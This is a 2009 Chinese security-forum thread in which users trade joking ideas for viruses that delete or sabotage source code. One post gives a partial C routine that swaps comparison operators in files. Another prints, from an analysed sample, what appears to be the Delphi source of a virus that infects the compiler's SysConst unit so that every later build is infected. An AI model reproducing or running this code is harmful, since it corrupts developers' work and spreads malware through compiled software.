首页
社区
课程
招聘
最恶毒的病毒设想....
发表于: 2009-8-12 21:52 10842

最恶毒的病毒设想....

2009-8-12 21:52
10842
整盘搜索,删除 *.c;*.cpp;*.h

这样的病毒很恶毒吧。。。

呃!

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (28)
雪    币: 709
活跃值: (2420)
能力值: ( LV12,RANK:1010 )
在线值:
发帖
回帖
粉丝
2
不邪恶,因为我每写一段代码,都会备份. 娃哈哈:

上传的附件:
  • 1.jpg (56.81kb,587次下载)
2009-8-12 22:43
0
雪    币: 225
活跃值: (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
3
你应该在删除一下*.rar,尤其是计算机name为大米的,哈哈
2009-8-12 22:48
0
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
4
唉,比老V的YY能力差远了~
2009-8-12 22:50
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
这还不是最恶毒的,最恶毒的应该是偷偷将cpp文件里面的

==改为!=或者>改成<
呵呵
2009-8-12 22:54
0
雪    币: 186
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
可以将 == 改成 =
把>= 改成 >
把<= 改成 <
把i 改成 j
...
2009-8-12 23:31
0
雪    币: 522
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
7
这样不一定能编译通过的  

把下面的对调
=改!=   
>改<
<改>

break改continue  

如果是驱动  这样改之后 八成会蓝  
2009-8-12 23:40
0
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
8
写病毒再带个词法分析器啊
2009-8-13 08:04
0
雪    币: 89
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
那个病毒很大。。。。
2009-8-13 09:41
0
雪    币: 1233
活跃值: (907)
能力值: ( LV12,RANK:750 )
在线值:
发帖
回帖
粉丝
10
用svn,代码在linux服务器上,你爱怎么折腾就怎么折腾,大不了我再checkout一份最新版本的
2009-8-13 19:42
0
雪    币: 238
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
天啊,一群邪恶的人
2009-8-13 19:59
0
雪    币: 33
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
他们的这些想法太恶毒了,
2009-8-13 20:18
0
雪    币: 232
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
那还不如用OOXX的声音替换开机音乐。。。这样的话。。。。。。
2009-8-13 20:39
0
雪    币: 157
活跃值: (10)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
14
赶紧备分一下代码。。。太坏了 。。。
2009-8-13 22:58
0
雪    币: 112
活跃值: (48)
能力值: ( LV9,RANK:320 )
在线值:
发帖
回帖
粉丝
15
恶滴神呀,,这也叫病毒啊
2009-8-13 23:09
0
雪    币: 249
活跃值: (14)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
邪恶的不是病毒 是你们
.....
2009-8-13 23:32
0
雪    币: 146
活跃值: (33)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
17
这个病毒绝了。。。
   顺便加点,把&&改为||,把||改为&&,去掉所有的!运算符
2009-8-14 01:04
0
雪    币: 210
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
团队开发的代码都在svn的服务器上。
2009-8-14 13:07
0
雪    币: 8835
活跃值: (2404)
能力值: ( LV12,RANK:760 )
在线值:
发帖
回帖
粉丝
19
全盘搜索工程,然后上传工程代码到指定服务器。
人工分析之,然后那啥那啥~
2009-8-15 19:43
0
雪    币: 8835
活跃值: (2404)
能力值: ( LV12,RANK:760 )
在线值:
发帖
回帖
粉丝
20
[QUOTE=sudami;670262]不邪恶,因为我每写一段代码,都会备份. 娃哈哈:

[/QUOTE]

逆了多少了?
2009-8-15 19:44
0
雪    币: 144
活跃值: (25)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
21
在C,CPP等文件里加入病毒代码。哈哈!
2009-8-16 00:49
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
难道就没人用版本控制器系统,比如svn或者git之类的?
2009-8-16 11:53
0
雪    币: 636
活跃值: (174)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
23
太邪恶了……太邪恶了……太邪恶了……太邪恶了……

手痒,整一小段。

BOOL infec(char* file){
    for(DWORD i=0;i!=size.LowPart;++i){
        if(buff[i]=='<'){
            buff[i]='>';        //< to >
        }else if(buff[i]=='>'){
            buff[i]='<';        //> to <
        }else if(i+1<size.LowPart){
            if(buff[i]=='='&&buff[i+1]=='='){
                buff[i]='!';      //== to !=
                i++;
            }else if(buff[i]=='!'&&buff[i+1]=='='){
                buff[i]='=';      //!= to ==
                i++;
            }else if(buff[i]=='!'){
                buff[i]=' ';      //remove !
            }
        }
    }
}
恩,修改一下,不能太详细……
太邪恶了……还在震撼中,谁要真做这种病毒应该会被人肉的。。。
2009-8-17 10:41
0
雪    币: 208
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
。。。

没想到,整出这么多恶毒的点子来。。

看雪果然充满邪恶。哈哈!
2009-8-17 13:25
0
雪    币: 101
活跃值: (88)
能力值: ( LV2,RANK:140 )
在线值:
发帖
回帖
粉丝
25
有人想就有人干啊, 不服不行. 不是楼主干的吧?

听说是重新编译了Delphi的库文件,搞的所有编译后的程序都带毒。看了一个样本,好像是飘云阁的Kaspersky注册码生成器, 由此可以推断,这个飘云阁的高手中毒了.

0x4078B0 : uses windows; var sc:array[1..24] of string=(
0x4078E8 : function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]
0x407944 : =#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;
0x4079A0 : h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin
0x4079FC : h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle
0x407A58 : (h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile
0x407AB4 : (f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while
0x407B10 : not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0
0x407B6C : then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2
0x407BC8 : ,$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,
0x407C24 : x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$
0x407C80 : )); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.
0x407CDC : wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,
0x407D38 : f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),
0x407D94 : pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,
0x407DF0 : 0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=
0x407E4C : CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,
0x407EA8 : @t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of
0x407F04 : char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(
0x407F60 : HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then
0x407FBC : begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=
0x408018 : 1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+
0x408074 : $.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;
0x4080D0 : begin st; end.
2009-8-24 17:56
0
游客
登录 | 注册 方可回帖
返回
//